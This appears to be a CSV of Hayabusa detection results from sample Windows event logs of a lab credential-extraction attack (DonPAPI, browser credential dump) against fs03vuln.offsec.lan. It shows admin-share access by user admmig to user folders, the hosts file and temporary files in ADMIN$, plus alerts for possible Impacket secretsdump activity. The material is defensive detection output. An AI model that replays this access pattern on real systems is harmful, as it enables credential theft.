2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.848 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 20:53:07.706 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
